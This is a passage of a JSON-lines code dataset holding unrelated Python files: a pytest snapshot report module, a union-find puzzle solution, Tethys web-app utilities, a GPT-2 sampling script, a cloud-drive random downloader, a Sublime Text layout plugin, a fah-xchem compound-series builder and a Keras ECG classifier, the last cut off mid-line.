SnapshotFossils,\n SnapshotUnknownFossil,\n)\nfrom .location import TestLocation\nfrom .terminal import (\n bold,\n error_style,\n green,\n success_style,\n warning_style,\n)\n\n\nif TYPE_CHECKING:\n from .assertion import SnapshotAssertion # noqa: F401\n\n\n@attr.s\nclass SnapshotReport:\n base_dir: str = attr.ib()\n all_items: Set[Any] = attr.ib()\n ran_items: Set[Any] = attr.ib()\n update_snapshots: bool = attr.ib()\n is_providing_paths: bool = attr.ib()\n is_providing_nodes: bool = attr.ib()\n warn_unused_snapshots: bool = attr.ib()\n assertions: List[\"SnapshotAssertion\"] = attr.ib()\n discovered: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n created: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n failed: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n matched: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n updated: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n used: \"SnapshotFossils\" = attr.ib(factory=SnapshotFossils)\n\n def __attrs_post_init__(self) -> None:\n for assertion in self.assertions:\n self.discovered.merge(assertion.extension.discover_snapshots())\n for result in assertion.executions.values():\n snapshot_fossil = SnapshotFossil(location=result.snapshot_location)\n snapshot_fossil.add(\n Snapshot(name=result.snapshot_name, data=result.final_data)\n )\n self.used.update(snapshot_fossil)\n if result.created:\n self.created.update(snapshot_fossil)\n elif result.updated:\n self.updated.update(snapshot_fossil)\n elif result.success:\n self.matched.update(snapshot_fossil)\n else:\n self.failed.update(snapshot_fossil)\n\n @property\n def num_created(self) -> int:\n return self._count_snapshots(self.created)\n\n @property\n def num_failed(self) -> int:\n return self._count_snapshots(self.failed)\n\n @property\n def num_matched(self) -> int:\n return self._count_snapshots(self.matched)\n\n @property\n def num_updated(self) -> int:\n return self._count_snapshots(self.updated)\n\n @property\n def num_unused(self) -> int:\n return self._count_snapshots(self.unused)\n\n @property\n def ran_all_collected_tests(self) -> bool:\n return self.all_items == self.ran_items and not self.is_providing_nodes\n\n @property\n def unused(self) -> \"SnapshotFossils\":\n unused_fossils = SnapshotFossils()\n for unused_snapshot_fossil in self._diff_snapshot_fossils(\n self.discovered, self.used\n ):\n snapshot_location = unused_snapshot_fossil.location\n if self.is_providing_paths and not any(\n TestLocation(node).matches_snapshot_location(snapshot_location)\n for node in self.ran_items\n ):\n continue\n\n if self.ran_all_collected_tests:\n unused_snapshots = {*unused_snapshot_fossil}\n mark_for_removal = snapshot_location not in self.used\n else:\n unused_snapshots = {\n snapshot\n for snapshot in unused_snapshot_fossil\n if any(\n TestLocation(node).matches_snapshot_name(snapshot.name)\n for node in self.ran_items\n )\n }\n mark_for_removal = False\n\n if unused_snapshots:\n marked_unused_snapshot_fossil = SnapshotFossil(\n location=snapshot_location\n )\n for snapshot in unused_snapshots:\n marked_unused_snapshot_fossil.add(snapshot)\n unused_fossils.add(marked_unused_snapshot_fossil)\n elif mark_for_removal:\n unused_fossils.add(SnapshotUnknownFossil(location=snapshot_location))\n return unused_fossils\n\n @property\n def lines(self) -> Iterator[str]:\n summary_lines: List[str] = []\n if self.num_failed:\n summary_lines.append(\n ngettext(\n \"{} snapshot failed.\", \"{} snapshots failed.\", self.num_failed,\n ).format(error_style(self.num_failed))\n )\n if self.num_matched:\n summary_lines.append(\n ngettext(\n \"{} snapshot passed.\", \"{} snapshots passed.\", self.num_matched,\n ).format(success_style(self.num_matched))\n )\n if self.num_created:\n summary_lines.append(\n ngettext(\n \"{} snapshot generated.\",\n \"{} snapshots generated.\",\n self.num_created,\n ).format(green(self.num_created))\n )\n if self.num_updated:\n summary_lines.append(\n ngettext(\n \"{} snapshot updated.\", \"{} snapshots updated.\", self.num_updated,\n ).format(green(self.num_updated))\n )\n if self.num_unused:\n if self.update_snapshots:\n text_singular = \"{} unused snapshot deleted.\"\n text_plural = \"{} unused snapshots deleted.\"\n else:\n text_singular = \"{} snapshot unused.\"\n text_plural = \"{} snapshots unused.\"\n if self.update_snapshots or self.warn_unused_snapshots:\n text_count = warning_style(self.num_unused)\n else:\n text_count = error_style(self.num_unused)\n summary_lines.append(\n ngettext(text_singular, text_plural, self.num_unused).format(text_count)\n )\n yield \" \".join(summary_lines)\n\n if self.num_unused:\n yield \"\"\n if self.update_snapshots:\n for snapshot_fossil in self.unused:\n filepath = snapshot_fossil.location\n snapshots = (snapshot.name for snapshot in snapshot_fossil)\n path_to_file = str(Path(filepath).relative_to(self.base_dir))\n deleted_snapshots = \", \".join(map(bold, sorted(snapshots)))\n yield warning_style(gettext(\"Deleted\")) + \" {} ({})\".format(\n deleted_snapshots, path_to_file\n )\n else:\n message = gettext(\n \"Re-run pytest with --snapshot-update to delete unused snapshots.\"\n )\n if self.warn_unused_snapshots:\n yield warning_style(message)\n else:\n yield error_style(message)\n\n def _diff_snapshot_fossils(\n self, snapshot_fossils1: \"SnapshotFossils\", snapshot_fossils2: \"SnapshotFossils\"\n ) -> \"SnapshotFossils\":\n diffed_snapshot_fossils: \"SnapshotFossils\" = SnapshotFossils()\n for snapshot_fossil1 in snapshot_fossils1:\n snapshot_fossil2 = snapshot_fossils2.get(\n snapshot_fossil1.location\n ) or SnapshotFossil(location=snapshot_fossil1.location)\n diffed_snapshot_fossil = SnapshotFossil(location=snapshot_fossil1.location)\n for snapshot in snapshot_fossil1:\n if not snapshot_fossil2.get(snapshot.name):\n diffed_snapshot_fossil.add(snapshot)\n diffed_snapshot_fossils.add(diffed_snapshot_fossil)\n return diffed_snapshot_fossils\n\n def _count_snapshots(self, snapshot_fossils: \"SnapshotFossils\") -> int:\n return sum(len(snapshot_fossil) for snapshot_fossil in snapshot_fossils)\n","sub_path":"src/syrupy/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":7940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"464142407","text":"class unionFindSet:\n def __init__(self):\n self.father = dict()\n self.rank = dict()\n self.count = 0\n def make_set(self, x):\n self.father[x] = x\n self.rank[x] = 0\n self.count += 1\n def union(self,x,y):\n self.link(self.find_father(x), self.find_father(y))\n def link(self,x,y):\n if x == y:\n pass\n else:\n self.count -= 1\n if self.rank[x] > self.rank[y]:\n self.father[y] = x\n else:\n self.father[x] = y\n if self.rank[x] == self.rank[y]:\n self.rank[y] += 1\n def find_father(self,x):\n if self.father[x] != x:\n self.father[x] = self.find_father(self.father[x])\n return self.father[x]\n \nclass Solution:\n def numSimilarGroups(self, A):\n \"\"\"\n :type A: List[str]\n :rtype: int\n \"\"\"\n if len(A) == 0 or len(A[0]) == 0: return 0\n L = len(A[0])\n N = len(A)\n ufs = unionFindSet()\n for x in A:\n ufs.make_set(x)\n if L < N: # too many words \n A_set = set(A)\n for word in A:\n for i in range(L):\n for j in range(i+1, L):\n new_word = word[:i] + word[j] + word[i+1:j] + word[i] + word[j+1:]\n if new_word in A_set:\n ufs.union(word, new_word)\n else: # too long words\n for i in range(N):\n for j in range(i+1, N):\n if self.similar(A[i], A[j]):\n ufs.union(A[i], A[j])\n return ufs.count\n \n def similar(self, word1, word2):\n count = 0\n for char1, char2 in zip(word1, word2):\n if char1 != char2:\n count += 1\n if count > 2: return False \n return True\n","sub_path":"Similar-String-Groups.py","file_name":"Similar-String-Groups.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"379292830","text":"\"\"\"\n********************************************************************************\n* Name: utilities.py\n* Author: Nathan Swain\n* Created On: 2014\n* Copyright: (c) Brigham Young University 2014\n* License: BSD 2-Clause\n********************************************************************************\n\"\"\"\nimport os\n\nfrom django.conf.urls import url\nfrom django.contrib.staticfiles import utils\nfrom django.contrib.staticfiles.finders import BaseFinder\nfrom django.core.files.storage import FileSystemStorage\nfrom django.utils._os import safe_join\nfrom collections import OrderedDict as SortedDict\n\nfrom tethys_apps.app_harvester import SingletonAppHarvester\n\n# Other dependency imports DO NOT ERASE\nfrom tethys_services.utilities import get_dataset_engine\n\n\ndef generate_app_url_patterns():\n \"\"\"\n Generate the url pattern lists for each app and namespace them accordingly.\n \"\"\"\n\n # Get controllers list from app harvester\n harvester = SingletonAppHarvester()\n apps = harvester.apps\n app_url_patterns = dict()\n\n for app in apps:\n if hasattr(app, 'url_maps'):\n url_maps = app.url_maps()\n elif hasattr(app, 'controllers'):\n url_maps = app.controllers()\n else:\n url_maps = None\n\n if url_maps:\n for url_map in url_maps:\n app_root = app.root_url\n app_namespace = app_root.replace('-', '_')\n\n if app_namespace not in app_url_patterns:\n app_url_patterns[app_namespace] = []\n\n # Create django url object\n if isinstance(url_map.controller, basestring):\n controller_parts = url_map.controller.split('.')\n module_name = '.'.join(controller_parts[:-1])\n function_name = controller_parts[-1]\n try:\n module = __import__(module_name, fromlist=[function_name])\n except ImportError:\n raise ValueError('\"{0}\" is not a valid controller function.'.format(url_map.controller))\n try:\n controller_function = getattr(module, function_name)\n except AttributeError:\n raise ValueError('\"{0}\" is not a valid controller function.'.format(url_map.controller))\n else:\n controller_function = url_map.controller\n django_url = url(url_map.url, controller_function, name=url_map.name)\n\n # Append to namespace list\n app_url_patterns[app_namespace].append(django_url)\n\n return app_url_patterns\n\n\ndef get_directories_in_tethys_apps(directory_names, with_app_name=False):\n # Determine the tethysapp directory\n tethysapp_dir = safe_join(os.path.abspath(os.path.dirname(__file__)), 'tethysapp')\n\n # Assemble a list of tethysapp directories\n tethysapp_contents = os.listdir(tethysapp_dir)\n tethysapp_match_dirs = []\n\n for item in tethysapp_contents:\n item_path = safe_join(tethysapp_dir, item)\n\n # Check each directory combination\n for directory_name in directory_names:\n # Only check directories\n if os.path.isdir(item_path):\n match_dir = safe_join(item_path, directory_name)\n\n if match_dir not in tethysapp_match_dirs and os.path.isdir(match_dir):\n if not with_app_name:\n tethysapp_match_dirs.append(match_dir)\n else:\n tethysapp_match_dirs.append((item, match_dir))\n\n return tethysapp_match_dirs\n\n\nclass TethysAppsStaticFinder(BaseFinder):\n \"\"\"\n A static files finder that looks in each app in the tethysapp directory for static files.\n This finder search for static files in a directory called 'public' or 'static'.\n \"\"\"\n\n def __init__(self, apps=None, *args, **kwargs):\n # List of locations with static files\n self.locations = get_directories_in_tethys_apps(('static', 'public'), with_app_name=True)\n\n # Maps dir paths to an appropriate storage instance\n self.storages = SortedDict()\n\n for prefix, root in self.locations:\n filesystem_storage = FileSystemStorage(location=root)\n filesystem_storage.prefix = prefix\n self.storages[root] = filesystem_storage\n\n super(TethysAppsStaticFinder, self).__init__(*args, **kwargs)\n\n def find(self, path, all=False):\n \"\"\"\n Looks for files in the Tethys apps static or public directories\n \"\"\"\n matches = []\n for prefix, root in self.locations:\n matched_path = self.find_location(root, path, prefix)\n if matched_path:\n if not all:\n return matched_path\n matches.append(matched_path)\n return matches\n\n def find_location(self, root, path, prefix=None):\n \"\"\"\n Finds a requested static file in a location, returning the found\n absolute path (or ``None`` if no match).\n \"\"\"\n if prefix:\n prefix = '%s%s' % (prefix, os.sep)\n if not path.startswith(prefix):\n return None\n path = path[len(prefix):]\n path = safe_join(root, path)\n if os.path.exists(path):\n return path\n\n def list(self, ignore_patterns):\n \"\"\"\n List all files in all locations.\n \"\"\"\n for prefix, root in self.locations:\n storage = self.storages[root]\n for path in utils.get_files(storage, ignore_patterns):\n yield path, storage","sub_path":"tethys_apps/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"319352750","text":"from transformers import GPT2LMHeadModel, GPT2Tokenizer\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nMODEL = 'gpt2-medium'\nDEV = 'cuda'\nTOP_K = 10\nLENGTH = 50\nWEIGHTS = [0.01, 0.01]\nWEIGHTS = [0.02]\n\nCOND = 'positive politics'\nCOND = 'negative politics'\nCOND = 'positive'\nCOND = 'negative science'\nCOND = 'positive science'\nCOND = 'negative'\n\nPREFIX = 'To conclude'\nPREFIX = 'The potato'\nPREFIX = 'The following is a negative sentence. The chicken tastes'\n\n\ndef top_k_filtering(logits, top_k=1, filter_value=-float(\"Inf\"), min_tokens_to_keep=1):\n top_k = min(max(top_k, min_tokens_to_keep), logits.size(-1))\n ids_to_remove = logits < torch.topk(logits, top_k)[0][..., -1, None]\n ids_to_retain = torch.topk(logits, top_k)[1][0]\n logits[ids_to_remove] = filter_value\n return logits, ids_to_retain\n\n\ntokenizer = GPT2Tokenizer.from_pretrained(MODEL)\nmodel = GPT2LMHeadModel.from_pretrained(MODEL).to(DEV)\nCOND_IDS = torch.tensor([tokenizer.encode(COND)]).to(DEV)\n\n# embed = model.get_input_embeddings()\n# cond_embeds = embed(COND_IDS)[0]\n# for i in range(cond_embeds.shape[0]):\n# embed.weight.data += WEIGHTS[i] * cond_embeds[i]\n\n\ninput_ids = torch.tensor([tokenizer.encode(PREFIX, add_special_tokens=True)]).to(DEV)\n# past = model(input_ids[:, :-1])[1]\n\nfor t in range(input_ids.shape[1], LENGTH): # +1 for the last time step of prefix\n\n # model = GPT2LMHeadModel.from_pretrained(MODEL).to(DEV)\n # criterion = torch.nn.CrossEntropyLoss()\n # optimizer = torch.optim.SGD(model.parameters(), lr=0.00008)\n # for step in range(1):\n # logits, _ = model(input_ids)\n # loss = criterion(logits[:, -1], COND_IDS[0])\n # model.zero_grad()\n # loss.backward()\n # # clip_grad_norm(model.parameters(), 0.5)\n # optimizer.step()\n\n\n with torch.no_grad():\n logits, _ = model(input_ids)\n logits = logits[:, -1]\n logits, ids_to_retain = top_k_filtering(logits, TOP_K)\n probs = F.softmax(logits, dim=-1)\n next_tokens = torch.multinomial(probs, num_samples=1)\n input_ids = torch.cat([input_ids, next_tokens], dim=-1)\n\nprint(tokenizer.decode(input_ids[0]))\n","sub_path":"ours/method5.py","file_name":"method5.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204404786","text":"#!/usr/bin/env python3\n\nimport json\nimport sqlite3\nimport random\nimport os\nimport time\nimport logging\nimport logging.handlers\nimport module.acdcli_cmd as acdcli\n\npath = os.path.dirname(os.path.realpath(__file__))\nconfig_path = path + '/config.json'\n\ntry:\n with open(config_path, 'r') as f:\n config = json.load(f)\nexcept:\n exit()\n\n# logger setting\nlogger = logging.getLogger('downloader logger')\nfomatter = logging.Formatter('[%(levelname)s|%(filename)s:%(lineno)s] %(asctime)s > %(message)s')\nfileHandler = logging.handlers.RotatingFileHandler(config['local'] + '/.downloader.log', maxBytes = 1024*1024, backupCount = 5)\nfileHandler.setFormatter(fomatter)\nstreamHandler = logging.StreamHandler()\nstreamHandler.setFormatter(fomatter)\nlogger.addHandler(fileHandler)\nlogger.addHandler(streamHandler)\nlogger.setLevel(logging.DEBUG)\n\nlocal = config['local']\ndb_path = local + '/.downloader.db'\ntry:\n with sqlite3.connect(db_path) as con:\n cur = con.cursor()\n query = 'select * from config'\n config = cur.execute(query).fetchone()\n\n remote = config[1]\n limit_size = config[3]\n current_size = config[4]\n logger.info('-----begin-----')\n logger.info('remote: ' + remote)\n logger.info('limit_size: ' + str(limit_size))\n logger.info('current_size: ' + str(current_size))\n if limit_size < current_size:\n logger.info('delete start')\n with sqlite3.connect(db_path) as con:\n cur = con.cursor()\n cur.execute('begin exclusive')\n query = 'select * from files where status=? order by random() limit 1'\n file_info = cur.execute(query, ('complete',)).fetchone()\n logger.info('select, ' + file_info[1])\n query = 'update files set status=? where hash=?'\n cur.execute(query, ('incomplete', file_info[0]))\n con.commit()\n\n os.remove(local + '/' + file_info[1])\n logger.info('delete ' + file_info[1] + ' from local')\n\n with sqlite3.connect(db_path) as con:\n cur = con.cursor()\n cur.execute('begin exclusive')\n query = 'delete from files where hash=?'\n cur.execute(query, (file_info[0],))\n query = 'select * from config'\n config = cur.execute(query).fetchone()\n query = 'update config set date=?, current_size=? where date=?'\n arg = (time.strftime('%c'), config[4] - file_info[2], config[0])\n cur.execute(query,arg)\n con.commit()\n logger.info('delete complete')\n else:\n logger.info('download start')\n # file select from remote loop\n while True:\n acdcli.sync()\n logger.info('acdcli sync')\n ret = acdcli.ls(remote)\n logger.info('acdcli ls')\n file_info = acdcli.parsing(random.choice(ret))\n logger.info('choice random file')\n with sqlite3.connect(db_path) as con:\n cur = con.cursor()\n cur.execute('begin exclusive')\n query = 'select * from files where hash=?'\n record = cur.execute(query, (file_info[0],)).fetchone()\n if not record:\n query = 'insert into files values (?, ?, ?, ?)'\n cur.execute(query, file_info + ('incomplete',))\n con.commit()\n break;\n # after select\n logger.info('select, ' + file_info[1])\n acdcli.sync()\n acdcli.download(remote + '/' + file_info[1], local + '/')\n logger.info('acdcli download')\n with sqlite3.connect(db_path) as con:\n cur = con.cursor()\n cur.execute('begin exclusive')\n query = 'update files set status=? where hash=?'\n cur.execute(query, ('complete', file_info[0]))\n query = 'select * from config'\n config = cur.execute(query).fetchone()\n query = 'update config set date=?, current_size=? where date=?'\n arg = (time.strftime('%c'), config[4] + file_info[2], config[0])\n cur.execute(query, arg)\n con.commit()\n logger.info('download complete')\n logger.info('-----end-----')\nexcept Exception as e:\n logger.info(e)\n","sub_path":"downloader/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":4236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"474316359","text":"import os\nimport sublime\nimport sublime_plugin\n\nclass SplitPaneCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 1:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.85, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})\n\t\t\tw.focus_group(1)\n\t\t\tfilename = os.path.expanduser(\"~/todo\")\n\t\t\tw.open_file(filename)\n\t\t\tsublime.status_message(\"Opening file \" + filename)\t\n\t\t\tactiveView = w.active_view()\n\t\t\tactiveView.set_syntax_file(\"Packages/MarkdownEditing/Markdown.tmLanguage\")\n\t\t\tactiveSettings = activeView.settings()\n\t\t\tactiveSettings.set('gutter', False)\n\t\t\tactiveSettings.set('word_wrap', 'auto')\n\t\t\tactiveSettings.set('wrap_width', 0)\n\t\t\tactiveSettings.set('color_scheme', \"Packages/MarkdownEditing/MarkdownEditor-Dark.tmTheme\")\n\t\telse:\n\t\t\tw.focus_group(1)\n\t\t\tw.run_command('close')\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1]]\n\t\t\t})\n\nclass ExpandRightPanelCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 2:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.5, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})\n\nclass ExpandRightPanelFurtherCommand(sublime_plugin.WindowCommand):\n\tdef run(self):\n\t\tw = self.window\n\t\tif w.num_groups() == 2:\n\t\t\tw.run_command('set_layout', {\n\t\t\t\t'cols': [0.0, 0.25, 1.0],\n\t\t\t\t'rows': [0.0, 1.0],\n\t\t\t\t'cells': [[0, 0, 1, 1], [1, 0, 2, 1]]\n\t\t\t})","sub_path":"todo.py","file_name":"todo.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"174353930","text":"#!/bin/env python\n\n\"\"\"\nCreate fah-xchem compound set JSON for Sprint 5 file using new schema\n\nDO NOT USE - it uses the compounds SDF 2D file which may screw up stereochemistryx\n\"\"\"\n\nimport numpy as np\nimport json\nimport math\nimport itertools\nimport datetime\nfrom rich.progress import track\nfrom openeye import oechem\n\nxchem_project = 'Mpro'\ncreator = 'John Chodera '\nff = 'openff-1.3.0'\ncreation_date = datetime.datetime.now() \n\nxchem_fragment_id = 'x11498'\nreference_compound_id = 'MAT-POS-b3e365b9-1'\n\n#xchem_fragment_id = 'x12073'\n#reference_compound_id = 'MAT-POS-8a69d52e-7'\n\n# monomer\nseries_name = f'sprint-5-stereofix-{xchem_fragment_id}-monomer-neutral'\ndescription = f\"COVID Moonshot Sprint 5 to prioritize benzopyran-isoquinoline series based on {xchem_fragment_id} ({reference_compound_id}) to optimize substituents in the P1' pocket with Mpro monomer and neutral Cys145:His41\"\n\n# dimer\nseries_name = f'sprint-5-stereofix-{xchem_fragment_id}-dimer-neutral'\ndescription = f\"COVID Moonshot Sprint 5 to prioritize benzopyran-isoquinoline series based on {xchem_fragment_id} ({reference_compound_id}) to optimize substituents in the P1' pocket with Mpro dimer and neutral Cys145:His41\"\n\njson_filename = f'json/{series_name}.json' # output filename\nmicrostates_sdf_filename = f'docked/sprint-5-microstates-{xchem_fragment_id}-sorted.sdf' # microstates with docked geometries\ncompounds_sdf_filename = f'docked/sprint-5-compounds.sdf' # compounds with annotation\nsmarts = 'C(=O)Nc1cncc2ccccc12' # SMARTS for common core scaffold : linker:isoquinoline\nreceptors = f'../receptors/monomer/Mpro-{xchem_fragment_id}_0_bound-protein-thiolate.pdb'\nreceptor_variant = {'catalytic-dyad' : 'His41(0) Cys145(0)'}\ntemperature = 300.0 # kelvin\npH = 7.3 # pH (fluorescence assay)\nionic_strength_millimolar = 70.0 # millimolar\nreference_microstate_id = f'{reference_compound_id}_1' # microstate id for reference for transformations\n\ndef get_compound_id(microstate_id):\n \"\"\"\n Extract the compound ID from a microstate ID (which includes a wart suffix like '_1', '_2')\n\n Parameters\n ----------\n microstate_id : str\n The microstate ID, which includes a wart suffix (e.g. 'MAT-POS-8a69d52e-7_1')\n\n Returns\n -------\n compound_id : str\n The compound ID (e.g. 'MAT-POS-8a69d52e-7_1')\n \"\"\"\n import re\n match = re.match('^(?P\\S+)_(?P\\d+)$', microstate_id)\n if match is None:\n # No warts; compound and microstate are identical\n compound_id = microstate_id\n else:\n # Remove the wart\n compound_id = match.group('compound_id')\n return compound_id\n\n# Project pair\nfrom fah_xchem.schema import ProjectPair\nfah_projects = ProjectPair(\n #complex_phase=13438, # monmer complex\n #solvent_phase=13439 # monomer solvent\n complex_phase=13440, # dimer complex\n solvent_phase=13441 # dimer solvent\n)\n\n# Compound series metadata\nfrom fah_xchem.schema import CompoundSeriesMetadata\nseries_metadata = CompoundSeriesMetadata(\n name=series_name,\n description=description,\n creator=creator,\n created_at=creation_date,\n xchem_project=xchem_project,\n receptor_variant=receptor_variant,\n temperature_kelvin=temperature,\n ionic_strength_millimolar=ionic_strength_millimolar,\n pH=pH,\n fah_projects=fah_projects\n)\n\n# Compounds\nfrom openforcefield.topology import Molecule\nfrom fah_xchem.schema import Compound, CompoundMetadata\n\nfrom openeye import oechem\nprint('Processing compounds...')\ncompounds = dict()\nfrom openeye import oechem\nwith oechem.oemolistream(compounds_sdf_filename) as ifs:\n for oemol in ifs.GetOEGraphMols():\n # Set ID and SMILES\n compound_id = oemol.GetTitle()\n #smiles = Molecule.from_openeye(oemol, allow_undefined_stereo=True).to_smiles()\n smiles = oechem.OEMolToSmiles(oemol)\n # Extract experimental data, if present\n experimental_data = dict()\n if oechem.OEHasSDData(oemol,'f_avg_pIC50'):\n pIC50 = oechem.OEGetSDData(oemol, 'f_avg_pIC50')\n if pIC50 != '':\n pIC50 = float(pIC50)\n experimental_data['pIC50'] = pIC50\n # Extract information about the compound\n compound_metadata = CompoundMetadata(\n compound_id=compound_id,\n smiles=smiles,\n experimental_data=experimental_data,\n )\n # Create new compound\n compound = Compound(\n metadata=compound_metadata,\n microstates=list()\n )\n # Store compound\n compounds[compound_id] = compound\n\n# Microstates\nprint('Processing microstates...')\nfrom fah_xchem.schema import CompoundMicrostate, Microstate\nmicrostates = list()\nwith oechem.oemolistream(microstates_sdf_filename) as ifs:\n for oemol in ifs.GetOEGraphMols():\n microstate_id = oemol.GetTitle()\n #smiles = Molecule.from_openeye(oemol, allow_undefined_stereo=True).to_smiles()\n smiles = oechem.OEMolToSmiles(oemol)\n # Determine if our molecule has warts\n compound_id = oechem.OEGetSDData(oemol, 'compound')\n # Compile information about the microstate\n microstate = Microstate(microstate_id=microstate_id, smiles=smiles)\n microstates.append(microstate)\n # Add microstate to compound if it already exists\n compound_microstates = list() # previous compound microstates\n if not compound_id in compounds:\n raise Exception(f'Microstate {microstate_id} supposedly belongs to compound {compound_id}, but compound not found')\n compound = compounds[compound_id]\n compound = Compound(\n metadata=compound.metadata,\n microstates=compound.microstates + [microstate]\n )\n # Store compound\n compounds[compound_id] = compound\n\n# Find reference molecule index for transformations\nprint(f'Identifying reference microstate {reference_microstate_id} for transformations...')\nreference_microstate = None\nfor reference_microstate_index, microstate in enumerate(microstates):\n if microstate.microstate_id == reference_microstate_id:\n reference_microstate = microstate\nif reference_microstate is None:\n raise Exception(f'Could not find reference microstate id {reference_microstate_id} among microstates')\nprint(f'Reference microstate is ligand index {reference_microstate_index}')\nprint(reference_microstate)\n\n# Create transformations\nfrom fah_xchem.schema import Transformation, CompoundMicrostate\nrun_id = 0\ntransformations = list()\nprint('Creating transformations to reference microstate...')\nfor microstate_index, microstate in enumerate(microstates):\n # Skip the self-transformation\n if microstate_index == reference_microstate_index:\n continue\n\n # Create the transformation\n transformation = Transformation(\n run_id=run_id,\n xchem_fragment_id=xchem_fragment_id,\n initial_microstate=CompoundMicrostate(\n compound_id=get_compound_id(reference_microstate.microstate_id),\n microstate_id=reference_microstate.microstate_id\n ),\n final_microstate=CompoundMicrostate(\n compound_id=get_compound_id(microstate.microstate_id),\n microstate_id=microstate.microstate_id\n )\n )\n transformations.append(transformation)\n run_id += 1\n\n# Compile compound series\nfrom fah_xchem.schema import CompoundSeries\ncompound_series = CompoundSeries(\n metadata=series_metadata,\n compounds=list(compounds.values()),\n transformations=transformations\n)\n\n# Write JSON\nprint(f'Writing JSON to {json_filename}')\nif '.bz2' in json_filename:\n import bz2\n with bz2.open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\nelif '.gz' in json_filename:\n import gzip\n with gzip.open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\nelse:\n with open(json_filename, \"wt\") as f:\n f.write(compound_series.json())\n","sub_path":"synthetic-enumeration/sprint-5-stereofix/04-create-json.py","file_name":"04-create-json.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"232956479","text":"import numpy as np\r\nfrom sklearn.preprocessing import LabelEncoder\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom keras.layers import Input, Dense, Activation, BatchNormalization, Flatten, Conv1D\r\nfrom keras.layers import MaxPooling1D, Dropout\r\nfrom keras.models import Model\r\nimport keras.backend as K\r\n\r\nK.set_image_data_format('channels_last')\r\nlabEnc = LabelEncoder()\r\n\r\ndef cnnOverlap(input_shape):\r\n \"\"\"\r\n adding overlap in the conv layers, with batchnorm and dropouts\r\n \r\n Arguments:\r\n input_shape -- shape of the images of the dataset\r\n\r\n Returns:\r\n model -- a Model() instance in Keras\r\n \"\"\"\r\n # Define the input placeholder as a tensor with shape input_shape. Think of this as your input image!\r\n X_input = Input(input_shape)\r\n\r\n # CONV -> BN -> RELU Block applied to X\r\n X = Conv1D(16, 8, strides=4, name = 'conv0')(X_input)\r\n X = BatchNormalization(name = 'bn0')(X)\r\n X = MaxPooling1D(2, name='max_pool')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.1)(X)\r\n X = Conv1D(32, 4, strides=2, name = 'conv1')(X)\r\n X = BatchNormalization(name = 'bn1')(X)\r\n X = MaxPooling1D(2, name='max_pool1')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.2)(X)\r\n X = Conv1D(64, 4, strides=2, name = 'conv2')(X)\r\n X = BatchNormalization(name = 'bn2')(X)\r\n X = MaxPooling1D(2, name='max_pool2')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.3)(X)\r\n X = Conv1D(64, 4, strides=2, name = 'conv3')(X)\r\n X = BatchNormalization(name = 'bn3')(X)\r\n X = MaxPooling1D(2, name='max_pool3')(X)\r\n X = Activation('relu')(X)\r\n\r\n X = Dropout(.15)(X)\r\n # FLATTEN X (means convert it to a vector) + FULLYCONNECTED\r\n X = Flatten()(X)\r\n X = Dense(3, activation='softmax', name='fc')(X)\r\n\r\n # Create model. This creates your Keras model instance, you'll use this instance to train/test the model.\r\n model = Model(inputs = X_input, outputs = X, name='derp')\r\n return model\r\n\r\ndirName = 'training2017/'\r\nxVal = np.load(dirName + 'test.npy')\r\nyVal = np.load(dirName + 'testlabel.npy')\r\nyVal=yVal[:,1]\r\nlabels=labEnc.fit(yVal).classes_\r\n\r\navg, std = np.load('models/normParamsSemifinal.npy')\r\nclf = cnnOverlap((4096,1))\r\nclf.load_weights('models/cnnSemifinal')\r\n\r\ndef plotECG(x):\r\n plt.subplot(211)\r\n plt.plot(x[:2048])\r\n plt.subplot(212)\r\n plt.plot(x[2048:])\r\n plt.show()\r\n\r\ndef makePred(x):\r\n x = (x-avg)/std\r\n preds = clf.predict(x.reshape(*x.shape,1))\r\n return preds\r\n\r\ndef miniGame(idx=None):\r\n if idx==None:\r\n idx=np.random.randint(0,len(xVal))\r\n if idx >= len(xVal):\r\n return None\r\n x=xVal[idx]\r\n plotECG(x)\r\n guess=input('What do you think this 